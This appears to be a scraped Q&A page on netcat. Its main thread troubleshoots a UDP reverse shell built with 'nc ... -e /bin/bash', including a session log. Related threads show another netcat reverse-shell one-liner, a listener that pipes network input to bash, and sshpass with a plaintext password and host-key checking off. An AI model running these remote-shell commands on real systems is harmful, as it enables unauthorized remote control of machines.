Reverse shell using netcat and UDP is not working - linux

I'm trying to set up a reverse shell between two Linux machines (Kali v. 1.0.9), using the default installation of netcat.
Using the commands below, I was able to make a connection and relay text information between the two machines:
Listener:
nc -luvvp <port>
Client:
nc -uvv <ip> <port>
However, modifying the client's arguments to include executing bash upon a connection:
nc -uvv <ip> <port> -e /bin/bash
And no connection is made, I'm not quite sure how to get this to work, this doesn't seem to be a problem that other people have experienced and was unsure of how to solve the issue. It might also help to know that these commands work fine using the normal TCP mode, it's only after adding the u flag that it stops working for shells. Any help would be appreciated, thanks!

I did some experiments and realized that tunneling shell session via netcat over UDP is almost impossible. The bash does not know that the underlying file descriptor is the UDP socket bash calls read() with buffer size 1. That is fine for interactive shell but when received UDP datagram contains more than 1 byte then data is lost (except the first byte in the datagram).
The netcat uses the standard line buffer at the stdin and the whole line is sent in a single UDP datagram. But bash reads only the first byte from each line.
The other problem is that the client netcat exucuted via command
nc -uvv -e "/bin/bash" <ip> <port>
does not send any data to server because the bash is executed in non-interactive mode and it just waits for a command. The solution is to write a script to execute bash in the interactive mode:
$ cat bashinteractive
#!/bin/bash
/bin/bash -i
and call server
$ nc -luvvp <port>
and client
nc -uvv -e "./bashinteractive" <ip> <port>
But the usage is very inconvenient. It is possible to write command on server when each byte is followed by ENTER
$ ./nc -luvvp 6666
listening on [any] 6666 ...
connect to [10.0.2.15] from xxx.yyy.zzz [10.0.2.16] 37552
$ c
cd
d
/
/
$ l
ls
s
-
-l
l
total 92
drwxr-xr-x 2 root root 4096 Feb 7 15:22 bin
....
drwxr-xr-x 13 root root 4096 Oct 16 2013 var
$ e
ex
xi
it
t
exit
sent 30, rcvd 1422 : Connection refused
So my recommendation is to use other tool than netcat. Perhaps you can try
http://code.google.com/p/udptunnel/

Related

Check netcat reverse shell with script

I do reverse shell with netcat.
A side nc 192.168.100.113 4444 –e /bin/bash
B side nc –lvp 4444
I want to automated and check this process from B side with shell script that reverse shell really working.
In B side, after nc –lvp 4444 How can I wait until I will get a connection and than send ls command and check the result?

open telnet using shell and passing commands

I am new to linux and shell scripting. I want to connect to localhost and interact it.
#! /bin/bash
(exec /opt/scripts/run_server.sh)
when i execute this bash script, it starts listening on a port.
Listening on port xxxxx
Now i want to issue this command "telnet localhost xxxxx"
I tried something like this:
#! /bin/bash
(exec /opt/opencog/scripts/run_server.sh)&&
telnet localhost xxxxx
It is still listening on the port. But i think second command is not running. I expect another window showing that it is being connected like this.
vishnu#xps15:~$ telnet localhost xxxx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
server>
The reason why i executing these as a script is that, automatically in the server i need to carry out some process by issuing certain commands like this "scm" "parse" etc.....
vishnu#xps15:~$ telnet localhost xxxx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
server>scm
Entering scheme shell; use ^D or a single . on a line by itself to exit.
guile> (parse "i eat apple")
I have lots of text coming. Manually i cant issue this parse command for each and every sentence. so i want to automate. So i need to write a script for connecting to the server and interacting.
Any guidelines. Finally How to interact/send commands to this guile shell?
One way to login to the linux server as a same or different user and run some command or .sh script (very useful for post-commit hooks or cron jobs) is to use program called sshpass, for example a cron job command or svn post-commit hook would look like this:
/usr/bin/sshpass -p 'password' /usr/bin/ssh
-o StrictHostKeyChecking=no -q user#localhost 'any command'
Just replace password with your password, and user with your user, and put command that you need to run as that particular user...
To install sshpass it on ubuntu just type
apt-get install sshpass
Or on CentOs
yum install sshpass
I solved this with the netcat (nc) command.
$ echo "command1\ncommand2\n" | nc localhost xxxxx
I could manually connect to localhost using telnet localhost xxxx and then i can pass commands from shell to localhost like this.
If you need to use telnet, this solution may help you. Otherwise, use ssh, as other answer suggests.
You can use anything that produces output to write lines one by one, followed by "\r\n", and pipe these lines to ncat, e.g.:
echo -e "command1\r\ncommand2\r\n" | ncat localhost 5000
-e option makes echo interpret "\r\n" as special symbols.

Terminating TFTPD after file transfer

I am using inetutils tftpd which is started via inetd using the following entry in inetd.conf:
tftp dgram udp wait root /bin/tftpd -p -u root -s /home
(ignore the use of root account and /home directory, it's just for testing purposes, it will be changed later).
inetd version is inetd (GNU inetutils) 1.7
tftpd version is tftp-hpa 5.2, with remap, with tcpwrappers
Everything works fine, but the problem is that I don't have any information about the file transfer status. Having in mind that I have more than 10 scripts that rely on tftpd, I need to either:
terminate tftpd after the file transfer or error (because it keeps running in the background doing nothing)
make it display file transfer status in a way that I can grep sed or at least $?
Is this possible, and if not, what other tftpd server should I use?
From the man page for tftpd:
--timeout timeout, -t timeout
When run from inetd this specifies how long, in seconds, to wait for a second connection before terminating the server. inetd will then respawn the server when another request comes in. The default is 900 (15 minutes.)
Try changing your inetd.conf like so:
tftp dgram udp wait root /bin/tftpd -t 5 -p -u root -s /home
Then restart inetd and test.

unix netcat utility on linux, checking if connection was made

I am using netcat utility on linux to receive outputs from a program on a windows machine. My problem being that the program on the windows machine does not always give an output.
How can i check that either a connection has been made to netcat ?
What i am doing till now is "nc -l -v 9103 > output" then i check the size of output, the problem this poses is that netcat only write to a file after a certain buffer size has been reached or a new line char is encountered, so some cases evne though a connection has been made the file size is detected as zero.
How can i check if someone has made a connection with netcat.
I tried using
nc -l -v -e someprog.exe 9103 > output
but my netcat doesnt seem to support this
below are the options i have
$ nc -h
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-p port Specify local port for remote connects
-r Randomize remote ports
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
verbose mode will write connectivity to stderr, and you can redirect stderr to a file, the verbose log has something like
connect to [xxx] from [xxxx]
try
nc -l -v -p 9103 -k 1> output 2>connect.log
and monitor connect.log for connectivity
if you don't use -k , netcat quits after 1st connection.
If you can upgrade your copy of netcat: the modern versions (1.10, for one) have an option to execute a program (or a shell command) upon connect. Otherwise, you can make the netcat think it runs in a terminal (to disable buffering of stdout), by using for example script (it just saves everything on stdin/stdout/stderr in the given file). Or use logging features of screen and tmux.

Simple Socket Server in Bash?

Is there a way to quickly bind to a TCP port/ip address and simply print out all information to STDOUT? I have a simple debugging solution which writes things to 127.0.0.1:4444 and I'd like to be able to simply bind up a port from bash and print everything that comes across. Is there an easy way to do this?
$ nc -k -l 4444 > filename.out
see nc(1)
Just because you asked how to do it in bash, though netcat answer is very valid:
$ exec 3<>/dev/tcp/127.0.0.1/4444
$ cat <&3
That is working as you expecting:
nc -k -l 4444 |bash
and then you
echo "ls" >/dev/tcp/127.0.0.1/4444
then you see the listing performed by bash.
[A Brief Security Warning]
Of course if you leave a thing like this running on your computer, you have a wide open gateway for all kinds of attacks because commands can be sent from any user account on any host in your network. This implements no security (authentication, identification) whatsoever and sends all transmitted commands unencrypted over the network, so it can very easily be abused.
Adding an answer using ncat that #Freedom_Ben alluded to:
ncat -k -l 127.0.0.1 4444
and explanation of options from man ncat:
-k, --keep-open Accept multiple connections in listen mode
-l, --listen Bind and listen for incoming connections

Resources